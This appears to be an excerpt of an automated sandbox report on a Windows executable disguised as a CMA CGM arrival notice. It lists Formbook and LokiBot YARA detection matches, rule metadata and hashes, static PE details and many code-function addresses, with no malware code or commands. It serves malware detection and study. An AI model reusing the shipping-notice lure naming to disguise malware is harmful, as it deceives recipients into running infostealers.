      Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.1744759427.0000000000A04000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Initial sample is a PE file and has a suspicious nameShow sources
      Source: initial sampleStatic PE information: Filename: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 0000000E.00000002.1747108228.0000000004D6F000.00000004.00020000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.1744759427.0000000000A04000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007810550_2_00781055
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078F4F60_2_0078F4F6
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078B52A0_2_0078B52A
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007935040_2_00793504
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007875D70_2_007875D7
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078A83B0_2_0078A83B
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00781EEB0_2_00781EEB
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078907D0_2_0078907D
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078A0580_2_0078A058
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007860590_2_00786059
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007830500_2_00783050
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078A03A0_2_0078A03A
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078C03F0_2_0078C03F
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007890CD0_2_007890CD
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078C0B40_2_0078C0B4
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007820980_2_00782098
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007861400_2_00786140
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007891440_2_00789144
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078211D0_2_0078211D
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007811E10_2_007811E1
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007881E40_2_007881E4
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007841E70_2_007841E7
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078C1D80_2_0078C1D8
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078C1BD0_2_0078C1BD
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007821A00_2_007821A0
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007812780_2_00781278
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007862590_2_00786259
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078423D0_2_0078423D
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007822180_2_00782218
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007862180_2_00786218
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007892140_2_00789214
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007812EF0_2_007812EF
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007822D80_2_007822D8
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007862DC0_2_007862DC
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007892D00_2_007892D0
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007892B80_2_007892B8
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007892B40_2_007892B4
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007892950_2_00789295
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078228D0_2_0078228D
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078136C0_2_0078136C
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007853600_2_00785360
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007823380_2_00782338
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007893390_2_00789339
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007853300_2_00785330
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007863DD0_2_007863DD
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007813D50_2_007813D5
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007823B80_2_007823B8
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007893A80_2_007893A8
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007863890_2_00786389
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007884610_2_00788461
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007864590_2_00786459
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007814530_2_00781453
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007894310_2_00789431
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007864340_2_00786434
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078242C0_2_0078242C
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007864FC0_2_007864FC
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007824EE0_2_007824EE
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007824B80_2_007824B8
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007894B90_2_007894B9
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007884BB0_2_007884BB
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078F4BD0_2_0078F4BD
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007864A90_2_007864A9
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007884900_2_00788490
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078B4910_2_0078B491
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007895600_2_00789560
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007895370_2_00789537
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078752F0_2_0078752F
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007875F90_2_007875F9
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007865E80_2_007865E8
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007825E90_2_007825E9
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007855D90_2_007855D9
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078B5BC0_2_0078B5BC
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007865890_2_00786589
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007866710_2_00786671
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007896680_2_00789668
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078766D0_2_0078766D
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007826400_2_00782640
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007856350_2_00785635
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078B6280_2_0078B628
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007856F10_2_007856F1
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007896E90_2_007896E9
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007876C90_2_007876C9
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007826A00_2_007826A0
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078B6A00_2_0078B6A0
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007827700_2_00782770
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007877580_2_00787758
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078575F0_2_0078575F
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007867540_2_00786754
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007827150_2_00782715
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007867010_2_00786701
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007847F90_2_007847F9
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007867FD0_2_007867FD
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007807F10_2_007807F1
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007827ED0_2_007827ED
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007817D90_2_007817D9
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007857D50_2_007857D5
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007877C40_2_007877C4
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007807BB0_2_007807BB
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007847A40_2_007847A4
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007897830_2_00789783
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007868680_2_00786868
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007848650_2_00784865
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078185B0_2_0078185B
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007828550_2_00782855
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007878490_2_00787849
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007808340_2_00780834
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007898290_2_00789829
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078682C0_2_0078682C
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007908ED0_2_007908ED
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007858DD0_2_007858DD
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007868DD0_2_007868DD
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007828CC0_2_007828CC
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007898A00_2_007898A0
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078089F0_2_0078089F
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007858950_2_00785895
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007809790_2_00780979
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007909600_2_00790960
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078293C0_2_0078293C
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078991F0_2_0078991F
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007919150_2_00791915
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078990D0_2_0078990D
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007809030_2_00780903
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007889F90_2_007889F9
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007889FB0_2_007889FB
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007919B80_2_007919B8
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007899BC0_2_007899BC
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007829B10_2_007829B1
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_007889AC0_2_007889AC
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788A7C0_2_00788A7C
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078FA5F0_2_0078FA5F
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00791A310_2_00791A31
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00782A340_2_00782A34
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789A210_2_00789A21
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790A010_2_00790A01
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00791AE10_2_00791AE1
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788AE10_2_00788AE1
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789AC70_2_00789AC7
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00782AA40_2_00782AA4
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789A940_2_00789A94
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789B7C0_2_00789B7C
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790B510_2_00790B51
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788B540_2_00788B54
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00791B390_2_00791B39
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00782B1B0_2_00782B1B
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789B140_2_00789B14
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078FB010_2_0078FB01
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789BF80_2_00789BF8
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078EBE80_2_0078EBE8
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790BED0_2_00790BED
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00780B900_2_00780B90
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00791C790_2_00791C79
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789C600_2_00789C60
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00790C5D0_2_00790C5D
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00780C4D0_2_00780C4D
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788C450_2_00788C45
